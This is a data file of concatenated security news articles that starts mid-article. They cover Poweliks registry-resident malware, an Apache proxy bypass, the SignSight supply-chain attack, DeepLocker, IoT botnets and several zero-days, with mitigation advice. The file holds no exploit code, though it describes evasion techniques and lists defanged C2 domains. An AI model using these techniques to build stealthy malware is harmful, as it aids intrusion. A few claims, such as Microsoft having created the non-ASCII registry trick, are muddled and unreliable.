Researchers dubbed this persistent malware as Poweliks, which resides in the computer registry only and is therefore not easily detectable as other typical malware that installs files on the affected system which can be scanned by antivirus or anti-malware Software.
According to Paul Rascagneres, Senior Threat Researcher, Malware analyst at GData software, due to the malware's subsequent and step-after-step execution of code, the feature set was similar to a stacking principles of Matryoshka Doll approach.
Paul has made a number of name ripping malware and bots to uncover and undermine cyber crimes. He won last years' Pwnie Award at Black Hat Las Vegas for tearing through the infrastructure of Chinese hacker group APT1.
In order to infect a system, the malware spreads via emails through a malicious Microsoft Word document and after that it creates an encoded autostart registry key and to remain undetectable it keeps the registry key hidden, Rascagneres says.
The malware then creates and executes shellcode, along with a payload Windows binary that tried to connect to 'hard coded IP addresses' in an effort to receive further commands from the attacker.
""All activities are stored in the registry. No file is ever created,"" Rascagneres said in a blog post. ""So, attackers are able to circumvent classic anti-malware file scan techniques with such an approach and are able to carry out any desired action when they reach the innermost layer of [a machine] even after a system re-boot.""
""To prevent attacks like this, antivirus solutions have to either catch the initial Word document before it is executed (if there is one), preferably before it reached the customer's email inbox.""
To create an autostart mechanism, the malware creates a registry, which is a non-ASCII character key, as Windows Regedit cannot read or open the non-ASCII key entry.
Poweliks malware is quite dangerous and can perform a number of malicious activities. The malware can:
Download any payload
Install spyware on the infected computer to harvest users' personal information or business documents
Install banking Trojans in order to steal money
Install any other type of malicious software that can fulfil the needs of the attackers
used in botnet structures
generate immense revenue through ad-fraud
The non-ASCII trick is a tool which the Microsoft created and uses in order to hide its source code from being copied or tampered with, but this feature was later cracked by a security researcher.
The security and malware researchers on the KernelMode.info forum last month analysed a sample which is dropped by a Microsoft Word document that exploited the vulnerability described in CVE-2012-0158, which affected Microsoft products including Microsoft Office.
The malware authors distributed the malware as an attachment of fake Canada Post and/or USPS email allegedly holding tracking information.
""This trick prevents a lot of tools from processing this malicious entry at all and it could generate a lot of trouble for incident response teams during the analysis. The mechanism can be used to start any program on the infected system and this makes it very powerful,"" Rascagneres said.
Apache Patch released for Reverse proxy Bypass Vulnerability,https://thehackernews.com/2011/10/apache-patch-released-for-reverse-proxy.html,"Apache Patch released for Reverse proxy Bypass Vulnerability
Security experts at Context have discovered a hole in the Apache web server that allows remote attackers to access internal servers. Security experts are warning firms running the Apache web server to keep up to date with the latest patches after the Apache Software Foundation issued a security advisory to all customers highlighting a new vulnerability. The weakness in 1.3 and all 2.x versions of the Apache HTTP Server can be exploited only under certain conditions.
Reverse proxies are used to route external HTTP and HTTPS web requests to one of several internal web servers to access data and resources. Typical applications include load balancing, separating static from dynamic content, or to present a single interface to a number of different web servers at different paths.
Context explained that the attack is based on an Apache web server using the mod_rewrite proxy function, and uses a common hacking tool to change the request to access DMZ systems.""We can access any internal/DMZ system which the proxy can access including administration interfaces on firewalls, routers, web servers, databases etc,"" the firm said.""Context has had plenty of success with this attack where credentials are weak on the internal systems allowing for full network compromise e.g. uploading Trojan WAR files on to JBoss servers.""
Apache issued a patch for those who compile their own installations of the webserver. It wouldn't be surprising to see Linux distributions release their own security updates in the next few days. Apache's advisory also contains suggestions for writing proxy rules that prevent the attack from working. Adding a simple forward slash to certain configurations, for example, will go a long way to protecting sensitive systems. The line is ""RewriteRule (.*)\.(jpg|gif|png)"" could expose internal servers, while the line ""RewriteRule /(.*)\.(jpg|gif|png)"" (note the extra ""/"") will ensure they remain protected.
The best way to prevent this type of attack is to apply the new Apache patch and run the latest version of the software, and to ensure that your reverse proxy rewrite rules can't be employed to access internal systems, according to Context.
Healthcare Industry Witnessed 45% Spike in Cyber Attacks Since Nov 20,https://thehackernews.com/2021/01/healthcare-industry-witnessed-45-spike.html,"Cyberattacks targeting healthcare organizations have spiked by 45% since November 2020 as COVID-19 cases continue to increase globally.
According to a new report published by Check Point Research today and shared with The Hacker News, this increase has made the sector the most targeted industry by cybercriminals when compared to an overall 22% increase in cyberattacks across all industry sectors worldwide seen during the same time period.
The average number of weekly attacks in the healthcare sector reached 626 per organization in November as opposed to 430 the previous month, with attack vectors ranging from ransomware, botnets, remote code execution, and distributed denial-of-service (DDoS) attacks.
Ransomware attacks against hospitals also marked their biggest jump, with Ryuk and Sodinokibi emerging as the primary ransomware variants employed by various criminal groups.
""The usage of Ryuk emphasizes the trend of having more targeted and tailored ransomware attacks rather than using a massive spam campaign, which allows the attackers to make sure they hit the most critical parts of the organization and have a higher chance of getting paid,"" Omer Dembinsky, Check Point's manager of data intelligence, said.
Central Europe topped the list of regions impacted by the increase in attacks against healthcare organizations with a 145% uptick in November, followed by East Asia (up 137%) and Latin America (up 112% increase). Europe and North America saw increases of 67% and 37% respectively.
The development follows a joint advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) last October, warning of an ""increased and imminent cybercrime threat to U.S. hospitals and healthcare providers.""
The alert cautioned of adversaries targeting the Healthcare and Public Health (HPH) sector with TrickBot and BazarLoader malware, resulting in ransomware infections, data theft, and the disruption of healthcare services.
Over the past two months, state-sponsored actors have ramped up their cyber assaults against government health ministries and companies involved in COVID-19 vaccine distribution, not to mention staging ransomware attacks on pharmaceutical firms such as Dr. Reddy's Laboratories that are engaged in vaccine trials.
Ransomware cases, in particular, have capitalized on the coronavirus pandemic, not least because it boosts the likelihood that hospitals will meet attackers' demands to quickly recover access to critical systems and provide care to patients. The University of California paid the hackers 116 bitcoin ($1.14 million) after a NetWalker attack on its systems back in June.
""Medical services and research organizations [have become] targets for attacks seeking to steal valuable commercial and professional information, or to disrupt vital research operations,"" the researchers concluded.
""As the world's attention continues to focus on dealing with the pandemic, cybercriminals will also continue to use and try to exploit that focus for their own illegal purposes — so it's essential that both organizations and individuals maintain good cyber-hygiene to protect themselves against Covid-related online crime.""
Software Supply-Chain Attack Hits Vietnam Government Certification Authority,https://thehackernews.com/2020/12/software-supply-chain-attack-hits.html,"Cybersecurity researchers today disclosed a new supply-chain attack targeting the Vietnam Government Certification Authority (VGCA) that compromised the agency's digital signature toolkit to install a backdoor on victim systems.
Uncovered by Slovak internet security company ESET early this month, the ""SignSight"" attack involved modifying software installers hosted on the CA's website (""ca.gov.vn"") to insert a spyware tool called PhantomNet or Smanager.
According to ESET's telemetry, the breach happened from at least July 23 to August 16, 2020, with the two installers in question — ""gca01-client-v2-x32-8.3.msi"" and ""gca01-client-v2-x64-8.3.msi"" for 32-bit and 64-bit Windows systems — tampered to include the backdoor.
""The compromise of a certification authority website is a good opportunity for APT groups, since visitors are likely to have a high level of trust in a state organization responsible for digital signatures,"" ESET's Matthieu Faou said.
After the attack was reported to VGCA, the certificate authority confirmed that ""they were aware of the attack before our notification and that they notified the users who downloaded the trojanized software.""
The digital signature tool, mandated by Vietnam's Government Cipher Committee as part of an electronic authentication scheme, is used by the government sector as well as private companies to digitally sign documents using a USB token (also called a PKI token) that stores the digital signature and requires the aforementioned driver to operate.
As a consequence, the only way a user can get infected is when the compromised software hosted on the official website is manually downloaded and executed on the target system.
Once installed, the modified software starts the genuine GCA program to mask the breach and then runs the PhantomNet backdoor that masquerades as a seemingly harmless file named ""eToken.exe.""
The backdoor — compiled most recently on April 26 — takes the responsibility of collecting system information, with additional malicious capabilities deployed through plugins retrieved from hardcoded command-and-control servers (e.g. ""vgca.homeunix[.]org"" and ""office365.blogdns[.]com"") that mimic the names of VGCA and popular productivity software.
ESET said in addition to Vietnam, it saw victims in the Philippines, but their delivery mechanism remains unknown. The ultimate goal of the attackers remains unclear as well, what with little to no information about the post-compromise activity.
If anything, the incident highlights why supply-chain attacks are increasingly becoming a common attack vector among cyberespionage groups, as it allows the adversaries to deploy malware on many computers at the same time covertly.
In November, ESET disclosed a Lazarus campaign in South Korea that used legitimate security software and stolen digital certificates to distribute remote administration tools (RATs) on target systems.
Then last week, it also found that a chat software called Able Desktop, used by 430 government agencies in Mongolia, was abused to deliver the HyperBro backdoor, the Korplug RAT, and another Trojan called Tmanger.
Lastly, a supply-chain attack on SolarWinds Orion software discovered this week was exploited to breach several major US government agencies, including the Departments of Homeland Security, Commerce, Treasury, and State.
""Supply-chain attacks are typically hard to find, as the malicious code is generally hidden among a lot of legitimate code, making its discovery significantly more difficult,"" Faou concluded.
Operation Lotus Blossom APT - Elise Malware,https://thehackernews.com/2015/08/elise-malware-hacking.html,"Advanced Persistent Threat (APT) type attacks continue to emerge on a global scale. What makes these attacks deviate from the norm is often the resources required to develop and implement them: time, money, and the knowledge required to create custom pieces of malware to carry out specific, targeted attacks.
Operation Lotus Blossom is one of the more recent APT attacks that has been discovered and analyzed. It is an advanced adversary campaign against the mostly government and state-sponsored entities in the Philippines, Hong Kong, Vietnam, and Indonesia.
It is thought that this group carried out the attack to gain a geopolitical advantage by stealing specific information from government and military institutions in that area.
At this point, it is still too early to tell if the reach of the attack will extend to the private sector (a la Stuxnet and Duqu).
How does the attack work?
It was found that Operation Lotus Blossom involved a novel custom-built malware toolkit that the authors named Elise. This piece of malware was designed with some unique functions, including the ability to:
Evade sandbox detection
Connect to and control servers
Exfiltrate data
Deliver 2nd stage malware payloads
As has been seen in the case of many advanced cyber espionage groups, it begins with a spear phishing email. The email contains information that is very authentic and applicable to the government or military targets. For instance, it uses things like military rosters that targets expect to see. Once the victim sees the email and opens the attachment, a decoy document is presented that appears to be legitimate, however, what is actually happening is that a backdoor is being opened and malware is being installed on the victim's machine. This gives the attacker a base of operations to conduct additional network reconnaissance, compromise new systems, as well as deliver second stage malware or exfiltrate data.
Impact on you
Any malware installed on your network puts you at risk of compromise, especially one designed to steal data
Once installed, Elise can infect other machines and continue to deliver additional malware variants as needed
Elise is specially designed to steal data, putting you and your clients' sensitive information at risk
How AlienVault Help
AlienVault Labs continues to perform cutting edge research on threats like these, collecting large amounts of data and then creating expert threat intelligence as a result.
The Labs team has already released IDS signatures and a correlation rule to the AlienVault USM platform so customers can detect activity from Elise. Learn more about this threat intelligence update and others in our forum.
Unified Security Management (USM) Platform helps you to scan your network to identify assets that could be infected with the Elise malware, making it easy for you to prioritize efforts and quickly identify systems that need to be addressed first.
Not only can it identifies vulnerable systems, but it can also help you detect attempted exploits of the vulnerability.
Learn more about AlienVault USM:
Download a free 30-day trial
Watch a demo on-demand
Play with USM in our product sandbox (no download required)
Sony Pictures Hack — 5 Things You Need To Know,https://thehackernews.com/2014/12/sony-pictures-hack.html,"What a horrible start the holiday season in U.S. Over Thanksgiving weekend, Sony Pictures Entertainment suffered a massive data breach as ""Guardians of Peace"" hacked-into Sony Pictures' computer system that brought the studio's network to a screeching halt.
Following the hack, hackers leaked five unreleased Sony movies to Torrent file-sharing website during Black Friday. It's still not clear whether both the incident back to back with Sony Pictures belongs to same group of hackers or not, but here's what you need to know about the breach:
The U.S. Federal Bureau of Investigation (FBI) warned businesses that cyber criminals have used malicious software to launch destructive cyber-attacks in the United States, following the last week's massive data breach at Sony Pictures Entertainment, in which four unreleased films were stolen and pirate-shared.
In a five-page confidential 'flash' warning, FBI recommended users to strengthen the protection of their information systems and limit access to databases. But when asked if the same malicious software had been used against the Sony Pictures hack, FBI declined to comment.
This new ""destructive"" malware has capability to overwrite a victim host's master boot record and all data files. ""The overwriting of the data files will make it extremely difficult and costly, if not impossible, to recover the data using standard forensic methods,"" according to Reuters who independently obtained the report.
As we reported earlier, Sony Pictures is investigating the possibility that hackers working on behalf of North Korea were behind the hacking incident.
Sony hack is the payback for upcoming Kim Jong assassination comedy film. It is because the hack comes just a month before the scheduled release of Sony's upcoming comedy ""The Interview,"" a comedy about two journalists who are recruited by the CIA to assassinate North Korean leader Kim Jong Un.
The film became a source of international controversy, and the Pyongyang government denounced the film as ""undisguised sponsoring of terrorism, as well as an Act of War"" in a letter to U.N. Secretary-General Ban Ki-moon in June.
But pointing finger towards North Korea without any strong evidence would be wrong. So, we still won't confirm whether its cyber war by North Korea or some other unknown, sophisticated hacker.
Following the last weeks cyber-attack on Sony Pictures Entertainment, high-quality versions of five newest films – Annie, Fury, Still Alice, Mr. Turner and To Write Love on Her Arms – distributed by Sony Pictures leaked online during Black Friday.
Four of the leaked films have yet to hit the big screen. The remake of the 1982 released ""Annie"" is Sony's next big film, schedule to hit theaters on Dec. 19 with new stars Quvenzhané Wallis, Cameron Diaz and Jamie Foxx.
Two other new films, ""Mr. Turner"" and ""Still Alice"" are also considered possible Oscar contenders for their lead actors Timothy Spall and Julianne Moore.
Sony Pictures Entertainment has hired Mandiant incident response team of FireEye Inc to help clean-up the damage caused by the huge cyber attack on its network, which forced its employees to put pen to paper over the last few weeks.
In addition to the FireEye, FBI is also investigating the matter and is looking into the devastating leak of four of its upcoming movies, although it has not been confirmed that the leak of all the films came from the same data breach.
Mandiant is a well-known security incident response team of FireEye which deals in forensic analysis, repairs and network restoration. Mandiant is the same team that helped in the catastrophic security breach experienced by one of the world's largest retailer Target in 2013.
In August, Sony's PlayStation Network was completely taken down by a distributed denial-of-service (DDoS) attack, a common technique used by hackers to overwhelm a system with traffic and make the network temporarily inaccessible to users.
The gaming network also suffered a more severe hack in 2011, which led to the exposure of 77 million PlayStation and Qriocity accounts along with 25 million Sony Online Entertainment accounts, bringing the total to more than 100 million in one of the largest data breaches ever. The hack cost Sony 14 billion yen ($172 million), and it took the networks -- for downloading and playing games, movies, and music -- offline for about a month before bringing them back up.
Researchers Developed Artificial Intelligence-Powered Stealthy Malware,https://thehackernews.com/2018/08/artificial-intelligence-malware.html,"Artificial Intelligence (AI) has been seen as a potential solution for automatically detecting and combating malware, and stop cyber attacks before they affect any organization.
However, the same technology can also be weaponized by threat actors to power a new generation of malware that can evade even the best cyber-security defenses and infects a computer network or launch an attack only when the target's face is detected by the camera.
To demonstrate this scenario, security researchers at IBM Research came up with DeepLocker—a new breed of ""highly targeted and evasive"" attack tool powered by AI,"" which conceals its malicious intent until it reached a specific victim.
According to the IBM researcher, DeepLocker flies under the radar without being detected and ""unleashes its malicious action as soon as the AI model identifies the target through indicators like facial recognition, geolocation and voice recognition.""
Describing it as the ""spray and pray"" approach of traditional malware, researchers believe that this kind of stealthy AI-powered malware is particularly dangerous because, like nation-state malware, it could infect millions of systems without being detected.
The malware can hide its malicious payload in benign carrier applications, like video conferencing software, to avoid detection by most antivirus and malware scanners until it reaches specific victims, who are identified via indicators such as voice recognition, facial recognition, geolocation and other system-level features.
Also Read: Artificial Intelligence Based System That Can Detect 85% of Cyber Attacks
""What is unique about DeepLocker is that the use of AI makes the ""trigger conditions"" to unlock the attack almost impossible to reverse engineer,"" the researchers explain. ""The malicious payload will only be unlocked if the intended target is reached.""
To demonstrate DeepLocker's capabilities, the researchers designed a proof of concept, camouflaging well-known WannaCry ransomware in a video conferencing app so that it remains undetected by security tools, including antivirus engines and malware sandboxes.
With the built-in triggering condition, DeepLocker did not unlock and execute the ransomware on the system until it recognized the face of the target, which can be matched using publicly available photos of the target.
""Imagine that this video conferencing application is distributed and downloaded by millions of people, which is a plausible scenario nowadays on many public platforms. When launched, the app would surreptitiously feed camera snapshots into the embedded AI model, but otherwise behave normally for all users except the intended target,"" the researchers added.
""When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim's face, which was the preprogrammed key to unlock it.""
So, all DeepLocker requires is your photo, which can easily be found from any of your social media profiles on LinkedIn, Facebook, Twitter, Google+, or Instagram, to target you.
Trustwave has recently open-sourced a facial recognition tool called Social Mapper, which can be used to search for targets across numerous social networks at once.
The IBM Research group will unveil more details and a live demonstration of its proof-of-concept implementation of DeepLocker at the Black Hat USA security conference in Las Vegas on Wednesday.
Warning : Fake Grand Theft Auto V torrent spreading malware,https://thehackernews.com/2013/09/GTA-5-download-malware-hacker-torrent.html,"Excitement continues .. Rockstar Games schedule the release of latest The Grand Theft Auto series, GTA 5 on September 17, but Cyber Criminals has already released a fake version of GTA 5 contains malware on torrent networks.
Romanian security firm BitDefender issued warning that GTA V hasn't been leaked, and during installation you will be asked to complete a survey and send off a text message to gain the serial number. You will then be charged €1 per day on your phone bill and will be infected by a virus.
The PC version has yet to be announced, so trying to install it on your PC is a ridiculous idea; but that seems to be what a lot of people are doing.
""The survey opens in a web browser and, therefore, is able to perform a geographic redirect to the web page that corresponds to the area you are located in,"" said, Bitdefender Senior E-Threat Analyst Bogdan Botezatu.
This malware is a generic Trojan Trojan.GenericKDV.1134859, which can steal user information, tamper with system files or draft a computer into a botnet. This will result in you being charged for premium rate text messages sent by bogus firms.
The easiest way to avoid this malicious software is to not illegally download copies of GTA V, especially when the game isn't yet launched.
Researchers Link 'Sharpshooter' Cyber Attacks to North Korean Hackers,https://thehackernews.com/2019/03/north-korea-hacking.html,"Security researchers have finally, with ""high confidence,"" linked a previously discovered global cyber espionage campaign targeting critical infrastructure around the world to a North Korean APT hacking group.
Thanks to the new evidence collected by researchers after analyzing a command-and-control (C2) server involved in the espionage campaign and seized by law enforcement.
Dubbed Operation Sharpshooter, the cyber espionage campaign targeting government, defense, nuclear, energy, and financial organizations around the world was initially uncovered in December 2018 by security researchers at McAfee.
At that time, even after finding numerous technical links to the North Korean Lazarus hacking group, researchers were not able to immediately attribute the campaign due to a potential for false flags.
Researchers Analysed Sharpshooter's Command Server
Now, according to a press release shared with The Hacker News, a recent analysis of the seized code and command-and-control (C2) server allowed researchers to understand the inner working of the global cyber espionage campaign, concluding that the North Korean state-sponsored hacking group is behind Operation Sharpshooter.
Lazarus Group, also known as Hidden Cobra and Guardians of Peace, is believed to be backed by the North Korean government and had reportedly been associated with the 2017 global WannaCry ransomware attack, the 2016 SWIFT Banking hack, as well as the 2014 Sony Pictures hack.
The analysis also revealed that the global espionage campaign began as early as September 2017, a year earlier than previously thought and is still ongoing.
While previous attacks were primarily targeting telecommunications, government and financial sectors in the United States, Switzerland, and Israel, and other English-speaking countries, newly-discovered evidence suggests that Sharpshooter has expanded its focus to critical infrastructure, with the most recent attacks targeting Germany, Turkey, the United Kingdom, and the United States.
Operation Sharpshooter: Global Cyber-Espionage Campaign
The global espionage campaign spreads by sending malicious documents containing a weaponized macro to targets via Dropbox. Once opened and downloaded, the macro leverages embedded shellcode to inject the Sharpshooter downloader into the memory of Microsoft Word.
For further exploitation, this in-memory implant then covertly downloads the second-stage Rising Sun malware, which uses source code from the Lazarus Group's backdoor Trojan Duuzer, malware first circulated in 2015 targeting organizations in South Korea.
The Rising Sun malware then performs reconnaissance on the victim's network by gathering and encrypting data, including victim devices' computer name, IP address data, native system information and more.
""Access to the adversary's command-and-control server code is a rare opportunity. These systems provide insights into the inner workings of cyber attack infrastructure, are typically seized by law enforcement, and only rarely made available to private sector researchers,"" said Christiaan Beek, McAfee senior principal engineer, and lead scientist.
""The insights gained through access to this code are indispensable in the effort to understand and combat today's most prominent and sophisticated cyber attack campaigns.""
Moreover, analysis of the C2 server and file logs also revealed an African connection, as the researchers uncovered a network block of IP addresses originating from a city located in the African nation of Namibia.
""This led McAfee Advanced Threat Research analysts to suspect that the actors behind Sharpshooter may have tested their implants and other techniques in this area of the world prior to launching their broader campaign of attacks,"" the researchers say.
The C2 infrastructure used by the attackers has a core backend written in Hypertext Preprocessor (PHP), and Active Server Pages (ASP), which ""appears to be custom and unique to the group"" and has been part of the Lazarus operations since 2017.
New Rapidly-Growing IoT Botnet Threatens to Take Down the Internet,https://thehackernews.com/2017/10/iot-botnet-malware-attack.html,"Just a year after Mirai—biggest IoT-based malware that caused vast Internet outages by launching massive DDoS attacks—completed its first anniversary, security researchers are now warning of a brand new rapidly growing IoT botnet.
Dubbed 'IoT_reaper,' first spotted in September by researchers at firm Qihoo 360, the new malware no longer depends on cracking weak passwords; instead, it exploits vulnerabilities in various IoT devices and enslaves them into a botnet network.
IoT_reaper malware currently includes exploits for nine previously disclosed vulnerabilities in IoT devices from following manufactures:
Dlink (routers)
Netgear (routers)
Linksys (routers)
Goahead (cameras)
JAWS (cameras)
AVTECH (cameras)
Vacron (NVR)
Researchers believe IoT_reaper malware has already infected nearly two million devices and growing continuously at an extraordinary rate of 10,000 new devices per day.
This is extremely worrying because it took only 100,000 infected devices for Mirai to took down DNS provider Dyn last year using a massive DDoS attack.
Besides this, researchers noted that the malware also includes more than 100 DNS open resolvers, enabling it to launch DNS amplification attacks.
""Currently, this botnet is still in its early stages of expansion. But the author is actively modifying the code, which deserves our vigilance."" Qihoo 360 researchers say.
Meanwhile, researchers at CheckPoint are also warning of probably same IoT botnet, named ""IoTroop,"" that has already infected hundreds of thousands of organisations.
""It is too early to guess the intentions of the threat actors behind it, but with previous Botnet DDoS attacks essentially taking down the Internet, it is vital that organisations make proper preparations and defence mechanisms are put in place before attack strikes."" researchers said.
According to CheckPoint, IoTroop malware also exploits vulnerabilities in Wireless IP Camera devices from GoAhead, D-Link, TP-Link, AVTECH, Linksys, Synology and others.
At this time it is not known who created this and why, but the DDoS threat landscape is skyrocketing and could reach tens of terabits-per-second in size.
""Our research suggests we are now experiencing the calm before an even more powerful storm. The next cyber hurricane is about to come."" CheckPoint researchers warned.
You need to be more vigilant about the security of your smart devices. In our previous article, we have provided some essential, somewhat practical, solutions to protect your IoT devices.
Also Read: How Drones Can Find and Hack Internet-of-Things Devices From the Sky.
"Hackers Exploiting Microsoft Servers to Mine Monero - Makes $63,000 In 3 Months",https://thehackernews.com/2017/09/windows-monero-miners.html,"Mining cryptocurrencies can be a costly investment as it takes a monstrous amount of computing power, and thus hackers have started using malware that steals computing resources of computers it hijacks to make lots of dollars in digital currency.
Security researchers at security firm ESET have spotted one such malware that infected hundreds of Windows web servers with a malicious cryptocurrency miner and helped cybercriminals made more than $63,000 worth of Monero (XMR) in just three months.
According to a report published by ESET today, cybercriminals only made modifications to legitimate open source Monero mining software and exploited a known vulnerability in Microsoft IIS 6.0 to secretly install the miner on unpatched Windows servers.
Although ESET's investigation does not identify the attackers, it reports that the attackers have been infecting unpatched Windows web servers with the cryptocurrency miner since at least May 2017 to mine 'Monero,' a Bitcoin-like cryptocurrency.
The vulnerability (CVE-2017-7269) exploited by the attackers was discovered in March 2017 by Zhiniang Peng and Chen Wu and resides in the WebDAV service of Microsoft IIS version 6.0—the web server in Windows Server 2003 R2.
Therefore, hackers are only targeting unpatched machines running Windows Server 2003 to make them part of a botnet, which has already helped them made over $63,000 worth of Monero.
Since the vulnerability is on a web server, which is meant to be visible from the internet, it can be accessed and exploited by anyone. You can learn more about the vulnerability here.
The newly discovered malware mines Monero that has a total market valuation of about $1.4 billion, which is far behind Bitcoin in market capitalisation, but cybercriminals' love for Monero is due to its focus on privacy.
Unlike Bitcoin, Monero offers untraceable transactions and is anonymous cryptocurrency in the world today.
Another reason of hackers favouring Monero is that it uses a proof-of-work algorithm called CryptoNight, which suits computer or server CPUs and GPUs, while Bitcoin mining requires specific mining hardware.
However, this is not the first time when analysts have spotted such malware mining Monero by stealing computing resources of compromised computers.
In mid-May, Proofpoint researcher Kafeine discovered cryptocurrency mining malware, called 'Adylkuzz,' which was using EternalBlue exploit—created by the NSA and dumped last month by the Shadow Brokers in April—to infect unpatched Windows systems to mine Monero.
A week before that, GuardiCore researchers discovered a new botnet malware, dubbed BondNet, that was also infecting Windows systems, with a combination of techniques, for primarily mining Monero.
MongoDB phpMoAdmin GUI Tool Zero-day Vulnerability Puts Websites at Risk,https://thehackernews.com/2015/03/phpMoAdmin-mongoDB-exploit.html,"About two weeks back, over 40,000 organizations running MongoDB were found unprotected and vulnerable to hackers. Now, once again the users of MongoDB database are at risk because of a critical zero-day vulnerability making rounds in underground market.
MongoDB, one of the leading NoSQL databases, is an open-source database used by companies of all sizes, across all industries for a wide variety of applications. By leveraging in-memory computing, MongoDB provides high performance for both reads and writes.
Hacker known by the online moniker, ""sp1nlock"" has found a zero-day vulnerability in 'phpMoAdmin', a free, open-source, written in PHP, AJAX-based MongoDB GUI (graphical user interface) administration tool that allows you to easily manage noSQL database MongoDB.
According to multiple posts available on the exploit selling underground forums, the phpMoAdmin is vulnerable to a Zero-Day Remote Code Execution flaw that allows an unauthorized remote user to hijack the websites running phpMoAdmin tool.
At the time of writing, we have no idea that phpMoAdmin developers are aware of the this zero-day vulnerability or not, but this exploit is already for sale on underground exploits forums and has already been verified by the market administrators that — It Works!
It might be possible that number of buyers and hackers already have access to the phpMoAdmin zero-day exploit and, unfortunately, there is no patch yet available for thousands of vulnerable websites.
In order to protect yourself, users of MongoDB database are recommended to avoid using phpMoAdmin until the developer team releases a patch for the zero-day remote code execution vulnerability.
As an alternate to the phpMoAdmin, you can make use of other free MongoDB GUI Tools available, as follows:
RockMongo – A Powerful MongoDB GUI Tool
MongoVUE – A Desktop based MongoDB GUI Tool
Mongo-Express – A well featured MongoDB GUI Tool
UMongo – A Decent MongoDB GUI Tool
Genghis – A lightweight MongoDB GUI Tool
However, if you don't want to replace your phpMoAdmin file, then the simplest approach would be to restrict unauthorized access using htaccess password i.e. creating '.htpasswd' authentication for folder containing ""moadmin.php"" file.
'Highly Critical' Unpatched Zero-Day Flaw Discovered In Oracle WebLogic,https://thehackernews.com/2019/04/oracle-weblogic-hacking.html,"A team of cybersecurity researchers today published a post warning enterprises of an unpatched, highly critical zero-day vulnerability in Oracle WebLogic server application that some attackers might have already started exploiting in the wild.
Oracle WebLogic is a scalable, Java-based multi-tier enterprise application server that allows businesses to quickly deploy new products and services on the cloud. It's popular across both, cloud environment and conventional environments.
Oracle WebLogic application reportedly contains a critical deserialization remote code execution vulnerability that affects all versions of the software, which can be triggered if the ""wls9_async_response.war"" and ""wls-wsat.war"" components are enabled.
The vulnerability, spotted by the researchers from KnownSec 404, allows attackers to remotely execute arbitrary commands on the affected servers just by sending a specially crafted HTTP request—without requiring any authorization.
""Since the WAR package has a defect in deserializing the input information, the attacker can obtain the authority of the target server by sending a carefully constructed malicious HTTP request, and execute the command remotely without authorization,"" explains Chinese National Information Security Vulnerability Sharing Platform (CNVD).
The researchers also shared details of the zero-day vulnerability, tracked as CNVD-C-2019-48814, with the Oracle's team, but the company has not yet released a patch. The affected Oracle WebLogic versions are as follows:
WebLogic 10.X
WebLogic 12.1.3
According to the ZoomEye cyberspace search engine, more than 36,000 WebLogic servers are publicly accessible on the Internet, though it's unknown how many of these have the vulnerable components enabled.
A maximum number of Oracle WebLogic servers are deployed in the United States and China, with a lesser number in Iran, Germany, India, and so on.
Since Oracle releases security updates every three months and had already released a Critical Patch Update just this month, this zero-day issue is unlikely to be patched anytime soon (i.e., not before July), unless the company decides to roll out an out-of-band security update.
So, until the company releases an update to patch the vulnerability, server administrators are highly recommended to prevent their systems from exploitation by changing either of the two following settings:
Finding and deleting wls9_async_response.war, wls-wsat.war and restarting the Weblogic service, or
Preventing access to the /_async/* and /wls-wsat/* URL paths via access policy control.
Since Oracle WebLogic servers are an often target of attackers, there will be no surprise if attackers have already started exploiting this zero-day and then use vulnerable servers for their nefarious purposes.
DDoSing Hospital Networks Landed This Hacktivist in Jail for Over 10 Years,https://thehackernews.com/2019/01/ddos-attack-anonymous-hacker.html,"A simple DDoS attack could land you in jail for 10 years or even more.
A Massachusetts man has been sentenced to over 10 years in prison for launching DDoS attacks against the computer network of two healthcare organizations in 2014 to protest the treatment of a teenager at the centers.
Beyond serving 121 months in prison, Martin Gottesfeld, 34, was also ordered by U.S. District Judge Nathaniel Gorton to pay nearly $443,000 in restitution for damages he caused to the targeted facilities.
Gottesfeld carried out the DDoS attacks on behalf of the Anonymous hacker collective against Boston Children's Hospital (BCH) and Wayside Youth & Family Support Network—a nonprofit home treatment facility that provides a range of mental health counselings to children, young adults, and families in Massachusetts.
In April 2014, the hacker used a botnet of over 40,000 network routers that he infected with customized malicious software to carry out the DDoS attacks that not only knocked BCH off the internet but also knocked down several other hospitals in the Longwood Medical Area.
The DDoS attacks crippled Wayside Youth and Family Support Network for more than a week, causing the facility to spend $18,000 on response and mitigation efforts.
However, the cyberattacks on BCH was terrible which disrupted the BCH network for at least two weeks, crippling the hospital's day-to-day operations and its research capabilities that eventually costed the facility a total of over $600,000 in damages.
Gottesfeld has been in custody since February 2016 when he was arrested in Miami after he and his wife attempted to flee Massachusetts on a small boat, which was then rescued after being disabled off the coast of Cuba by a nearby Disney Cruise Ship.
Gottesfeld was convicted in August last year when a federal jury found him guilty of two counts, including conspiracy to intentionally damage protected computers and conspiracy to damage protected computers.
Gottesfeld represented himself at the hearing on Thursday at the U.S. District court in Boston and said he planned to appeal but had no regrets, according to Reuters.
""It was your arrogance and misplaced pride that has been on display in this case from the very beginning that led you to believe you know more than the doctors at Boston Children's Hospital,"" Judge Gorton said.
Gottesfeld argued that he carried out the attacks to protest the reportedly abusive treatment of teenage patient Justina Pelletier, who was the subject of a high-profile custody battle between her parents and the Commonwealth of Massachusetts.
BCH and Pelletier's parents entered a dispute over a diagnosis of their daughter and a judge awarded the teen's custody to the state of Massachusetts. After her diagnosis, Pelletier was later moved to Wayside Youth & Family Support Network and 16 months later, she was released to her parents on the court order.
Gottesfeld told Judge Gorton that he made a big difference in Pelletier's life and urged the judge to sentence him to time served, adding that ""My only regret is that I didn't get to Justina sooner. I wish I had done more.""
Assistant U.S. Attorney David D'Addio also called Gottesfeld a ""self-aggrandizing menace"" who put children's lives at risk and even believed that he could strike again once released from prison.
Gottesfeld's wife has planned to appeal the court hearing.
Adobe Reader PDF-tracking vulnerability reveals when and where PDF is opened,https://thehackernews.com/2013/04/adobe-reader-pdf-tracking-vulnerability.html,"McAfee said it has found a vulnerability in Adobe Systems' Reader program that reveals when and where a PDF document is opened. The issue emerges when some users launch a link to another file path, which calls on a JavaScript application programming interface (API), while Reader alerts a user when they are going to call on a resource from another place.
The issue is not a serious problem and does not allow for remote code execution, but McAfee does consider it a security problem and has notified Adobe. It affects every version of Adobe Reader, including the latest version, 11.0.2.
